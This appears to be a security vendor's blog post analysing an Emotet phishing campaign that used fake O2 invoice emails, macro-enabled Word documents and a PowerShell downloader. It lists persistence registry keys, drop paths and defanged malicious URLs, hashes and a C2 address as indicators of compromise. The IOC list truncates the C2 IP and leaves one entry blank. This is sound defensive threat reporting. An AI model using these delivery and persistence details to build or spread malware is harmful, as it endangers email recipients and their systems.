CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway. Learn More

CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway. Learn More

Services
Capture
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

twi-managed-portal-color
Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

twi-briefcase-color-svg
Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

tw-laptop-data
Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

twi-database-color-svg
Database Security

Prevent unauthorized access and exceed compliance requirements.

twi-email-color-svg
Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

tw-officer
Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

tw-network
Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

Emotet lives another day using Fake O2 invoice notifications

We witnessed a widespread phishing campaign targeting O2 customers, that surfaced on 18th August, 2017 and continued intermittently until 21st August, 2017. Telefonica UK Limited, trading as O2, is a major telco provider in the UK. In this campaign scammers sent out fake O2 invoice emails as spam. These spam phishing emails contained links to malicious Microsoft Word documents, that in turn infected victims with a banking trojan. The attack flow is shown here:

BSL_10116_7afe26ff-706c-4f58-bd90-662167e85318

 

Analysis of the Email

The scammers used spoofed email addresses in the email "From" field and sent out the same emails using one of the two subject lines:

  1. Subject: My O2 Business - Your O2 Bill is ready
  2. Subject: Your O2 bill is ready - (Victims Name)

The fake email message appears as a legit automated O2 bill invoice, that encourages the victims to click on the link to "View Billing Statement" as shown in Figure 1 and 2.

 

8031_13c50b02-8368-4bbc-b782-795c8106e5ef
Figure 1: O2 Phishing email message

 

10928_a03649d8-efcf-425f-a77d-998463cdb3d3
Figure 2: O2 phishing invoice messages pointing to malicious word document

 

Analysis of the Phishing link and the Malicious Word document:

Clicking on the link points the web browser to the Phishing site: (see Figure 3). The link appears to be hosted on a compromised web site, that downloads a malicious Word document "O2 bill - 805985874058.doc" (MD5: 2E8BBD0C8B7DE7D5F4E541C192421451). This word document contains a malicious obfuscated macro (see Figure 4):

9296_52c40fe0-7460-4f02-abe0-802f91a51ade

Figure 3: Malicious word document download via HTTP

 

BSL_12082_d87bf471-8eeb-4644-9696-872a0b80ddee
Figure 4: Malicious Macro

 

The macro executes a base 64 encoded Powershell command (see Figure 5).

BSL_11294_b20fbf18-c6bd-4572-999f-7c2760772156
Figure 5: Encoded Powershell command used by Macro

 

A decoded version of the command is show in Figure 6.

BSL_9367_55f959d8-bf51-4eb7-9c5b-47c18f215611
Figure 6: Decoded version of the Powershell command

 

Opening the macro enabled word document, launches the Powershell script, that downloads and executes a malware sample from the URL: hxxp://wernerbernheim(.)com(.)uy/capacitacion/bMLTBrcIE/

The downloaded malware is saved to: C:\Users\{user}\AppData\Local\Temp\{random}.exe , having MD5: D6EDE359E1ECBF8248B0FC8EF63CED7E .

Analysis of the Malware:

The downloaded malware is a variant of the Emotet malware. Emotet is a notorious multi-faceted banking trojan that rolls out different behaviors such as:

  • Info stealing module - emails, PST, browsers
  • Email spamming modules
  • Denial of service module

Depending on the module behavior, it drops a malware component to the following path:

  • %WINDIR%\system32\dcomevent.exe
  • %LOCALAPPDATA%\Microsoft\Windows\dcomevent.exe

For persistence, it creates the following registry keys:

  • HKLM\SYSTEM\CurrentControlSet\services\dcomevent
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run

It also tries to connect to its CnC server at IP 62.39.95.185 using HTTPS (see Figure 7).

11368_b5783efb-ce88-4ea7-98e3-e41ceef56944
Figure 7: HTTP traffic

 

The malware then loads its spam module and attempts to send out new spam/phishing emails to thousands of email addresses (see Figure 8). This is a typical spambot behavior, where first it performs DNS lookups on each target email domain and then sends the spam to the respective SMTP server for that domain.

9344_54c3d519-b2ed-4120-9a93-5a213a8eaed8
Figure 8: A snapshot of the SMTP traffic used by the malware to send out spam

 

Following the link provided in the spammed email downloads the same malicious word document file, but this time hosted on a different domain (see Figure 9).

BSL_10015_77248137-85e7-4977-b034-ee241db214ed
Figure 9: Link to malicious Word document sent out as spam by the malware

 

Indicators of Compromise (IOCs)

  • URL in the Email:
    • hxxp://marianamengote(.)com/RLDXAIYKZD2314573/
  • Malicious Word Document:
    • FileName: "O2 bill - 805985874058.doc"
    • MD5: 2E8BBD0C8B7DE7D5F4E541C192421451
  • URL to download Emotet:
  • Emotet variant:
    • MD5: D6EDE359E1ECBF8248B0FC8EF63CED7E
    • C2: 39.95.185

Conclusion

Attackers are leveraging the simplicity provided by the email infrastructure to distribute banking trojans to global victims. We observed one such targeted phishing campaign delivering counterfeit emails claiming to come from O2, a UK based telecom company. The legitimate-looking messages pretend to be dispatching a billing invoice, but the link included leads to a malicious Word document file. Upon opening the document it attempts to install a variant of the notorious Emotet banking Trojan. This variant is equipped with a spamming module that starts sending out spam messages containing infected links to email addresses globally. This type of attack flow (Spam->contains-malicious-link->downloads-malicious-document->downloads-and-executes-Trojan) appears to be on an increase on the threat landscape, likely as a measure to evade email gateways. Additionally, malware equipped with spamming modules used in such campaigns is designed to perpetuate the attack. As a mitigation measure, customers should avoid opening any email messages that appear suspicious, especially avoid opening any unexpected office documents containing macros.

Acknowledgements

We would like to thank Phil Hay for his valuable advice and guidance.

Latest SpiderLabs Blogs

The Secret Cipher: Modern Data Loss Prevention Solutions

This is Part 7 in my ongoing project to cover 30 cybersecurity topics in 30 weekly blog posts. The full series can be found here. Far too many organizations place Data Loss Prevention (DLP) and Data...

Read More

CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway

Overview A command injection vulnerability has been discovered in the GlobalProtect feature within Palo Alto Networks PAN-OS software for specific versions that have distinct feature configurations...

Read More

CNAPP, CSPM, CIEM, CWPP – Oh My!

We all know the cybersecurity industry loves its acronyms, but just because this fact is widely known doesn’t mean everyone knows the story behind the alphabet soup groups of letters, we must deal...

Read More